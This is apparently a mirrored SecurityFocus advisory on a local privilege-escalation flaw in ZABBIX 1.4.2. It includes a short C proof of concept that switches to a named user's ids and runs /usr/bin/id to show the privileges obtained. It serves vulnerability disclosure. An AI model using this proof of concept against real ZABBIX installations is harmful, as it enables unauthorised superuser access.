source: http://www.securityfocus.com/bid/26680/info
ZABBIX is prone to a local privilege-escalation vulnerability.
An attacker can exploit this issue to execute commands with superuser privileges. Successfully exploiting this issue will result in the complete compromise of affected computers.
This issue affects ZABBIX 1.4.2; prior versions may also be affected.
#include <sys/types.h>
#include <unistd.h>
#include <pwd.h>
#include <stdio.h>
int main()
{
struct passwd *pw;
pw = getpwnam("abi");
FILE *pipe;
char buf[25];
setgid(pw->pw_gid);
setuid(pw->pw_uid);
printf("my gid: %d\n", getegid());
printf("my uid: %d\n", getuid());
pipe = popen("/usr/bin/id", "r");
while (fgets(buf, sizeof buf, pipe)) {
printf("%s", buf);
}
printf("\n");
pclose(pipe);
}
京公网安备 11010502034610号
暂无评论